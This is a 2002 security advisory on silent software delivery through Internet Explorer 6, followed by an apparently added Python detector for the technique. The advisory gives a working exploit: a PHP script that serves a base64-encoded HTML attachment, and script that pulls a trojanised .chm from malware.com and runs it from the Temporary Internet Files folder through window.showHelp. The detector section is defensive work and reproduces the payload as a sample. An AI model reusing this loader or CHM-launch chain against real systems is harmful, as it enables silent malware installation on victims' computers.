14th Aug 2002 [SBWID-5628]
COMMAND
IE silent software delivery (remote exploit)
SYSTEMS AFFECTED
Internet Explorer 6
PROBLEM
http-equiv of malware [http://www.malware.com] found:
Yet another silent delivery and installation of an executable on the
target computer using Internet Explorer 6. This can be achieved by
reversing the following:
http://online.securityfocus.com/bid/5350
And:
HTM. In order to achieve the required results as outlined in the
above, we must determine the location of the Temporary Internet File
[TIF] folders. This can only be achieved if we can physically open up
our file from within and read its location. Technically that can only
be achieved if we have a security dialogue prompt asking us for
permission. If we elect to open the file through acceptance of the
security warning dialogue, it is opened from within the TIF by whatever
program is associated with that file.
Okay:
Okay. HTM. HTM files are associated with Internet Explorer. We force
our *.htm file open via a combination of server `misconfiguration` and
our PHP 'package' as below:
<?
function malware()
{
header("Content-type: text/html");
header("Content-Disposition: attachment");
echo base64_decode(
'PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW'.
'Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N'.
'Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm'.
'1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp'.
'dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm'.
'UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu'.
'Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn'.
'BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7'.
'DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG'.
'UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj'.
'cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF'.
'0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy'.
'aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT'.
'0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc'.
'bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX'.
'QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN'.
'CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA'.
'0KPC9TQ1JJUFQ+DQogDQoNCg=='.'');
}
malware();
?>
<iframe src=<? echo $PHP_SELF ?> width=1 height=1>
Where our PHP 'package' contains our now run-of-the-mill scripting to
determine our TIF location and our old friend the trojanised *.chm file
as follows:
<img dynsrc="http://www.malware.com/malware/malware.chm" width=1 height=1>
<SCRIPT>
// 7.02.02 http://www.malware.com
// you may consider writing several lines
// in case malware.chm arrives as [1] or [2] etc
function malware()
{
s=document.URL;
path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write('<FORM name="malware" ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');
document.write('<form><input type="hidden" size="40" maxlength="80" value="'+path+'\\malware[1].chm"></form>');
setTimeout('document.malware.submit()',10000);
}
setTimeout("malware()",2500);
</SCRIPT>
note: file path for *.chm must be long as we are now operating off the
server and from within the TIF
What this does is generate the default security warning for *.htm
files:
[screen shot: http://www.malware.com/malwarez.png 7KB]
Should we elect to open it, we are once again able to determine our TIF
location where our *.chm is now residing too and fire our scripting to
locate and call it.
[screen shot: http://www.malware.com/zerawlam.png 7KB]
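The delivery chain above leaves a recognisable signature on the wire: an HTML body served with Content-Disposition: attachment, an <img dynsrc> pointing at a .chm, script that derives the Temporary Internet Files path from document.URL, and a delayed form submit into window.showHelp(). The following is an added defender-side check, not code from the advisory or from malware.com, that a proxy or mail-gateway reviewer could run over a captured response to flag that combination. The regexes, the verdict thresholds, the scan_body/scan_headers/classify names and the sample response (which uses an example.invalid host) are all constructed for this example.

```python
import re

# Indicators taken from the advisory's description of the delivery chain.
# Each pattern is a constructed heuristic, not a vendor signature.
INDICATORS = {
    # <img dynsrc="...x.chm">: pulls a compiled help file into the TIF cache
    "dynsrc_chm": re.compile(
        r"<img[^>]*\bdynsrc\s*=\s*['\"]?[^'\" >]+\.chm\b", re.I),
    # window.showHelp(...): launches a .chm from a local path
    "showhelp_call": re.compile(r"window\.showHelp\s*\(", re.I),
    # document.URL ... lastIndexOf("\\"): recovers the cache directory the
    # page is being opened from
    "tif_path_probe": re.compile(
        r"document\.URL[\s\S]{0,200}?lastIndexOf\s*\(\s*['\"]\\\\['\"]\s*\)",
        re.I),
    # setTimeout('....submit()'): scripted form submit with no user action
    "auto_submit": re.compile(
        r"setTimeout\s*\(\s*['\"][^'\"]*\.submit\(\)", re.I),
}


def scan_body(body: str) -> set:
    """Return the names of the script-level indicators found in an HTML body."""
    return {name for name, rx in INDICATORS.items() if rx.search(body)}


def scan_headers(headers: dict) -> set:
    """Flag the header combination the advisory relies on: an HTML document
    forced to the download/open prompt via Content-Disposition: attachment."""
    h = {k.lower(): v.lower() for k, v in headers.items()}
    found = set()
    if ("attachment" in h.get("content-disposition", "")
            and h.get("content-type", "").startswith("text/html")):
        found.add("html_forced_download")
    return found


def classify(headers: dict, body: str) -> tuple:
    """Combine header and body indicators into (verdict, sorted indicator list).

    A .chm fetch or TIF path probe together with a showHelp() call is the
    core of the technique and is rated 'block'; any lone indicator is
    'review'; nothing found is 'allow'."""
    hits = scan_headers(headers) | scan_body(body)
    if ({"dynsrc_chm", "showhelp_call"} <= hits
            or {"tif_path_probe", "showhelp_call"} <= hits):
        verdict = "block"
    elif hits:
        verdict = "review"
    else:
        verdict = "allow"
    return verdict, sorted(hits)


# Constructed sample response modelled on the advisory's listing.
SAMPLE_HEADERS = {"Content-Type": "text/html",
                  "Content-Disposition": "attachment"}
SAMPLE_BODY = r'''<img dynsrc="http://example.invalid/malware.chm" width=1 height=1>
<SCRIPT>
function malware()
{
s=document.URL;
path=s.substr(-0,s.lastIndexOf("\\"));
path=unescape(path);
document.write('<FORM name="malware" ACTION="javascript:window.showHelp(document.forms[0].elements[0].value)">');
document.write('<form><input type="hidden" size="40" maxlength="80" value="'+path+'\\malware[1].chm"></form>');
setTimeout('document.malware.submit()',10000);
}
setTimeout("malware()",2500);
</SCRIPT>'''

# Constructed benign page: a timed refresh is not a scripted submit.
BENIGN_HEADERS = {"Content-Type": "text/html"}
BENIGN_BODY = ("<html><body><script>setTimeout('refresh()', 5000);"
               "</script></body></html>")

if __name__ == "__main__":
    for label, hdrs, body in (("sample", SAMPLE_HEADERS, SAMPLE_BODY),
                              ("benign", BENIGN_HEADERS, BENIGN_BODY)):
        verdict, hits = classify(hdrs, body)
        print(f"{label}: {verdict} {hits}")
```

The header check alone is not a verdict: forcing an .htm to the open/save prompt is exactly how this chain gets the file opened out of the cache, but it also occurs legitimately, which is why it only raises "review" unless the script indicators are present as well.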
Notes:
1. As indicated, this is the reverse of:
http://online.securityfocus.com/bid/5350 . In this instance the default
is the security warning which should be disengaged to allow this to
fail.
2. Tested series of win98 machines, Internet Explorer 6.0.2600 and all
of its bandages
3. We anxiously await the release of Internet Explorer 6 SP1.
SOLUTION
None yet.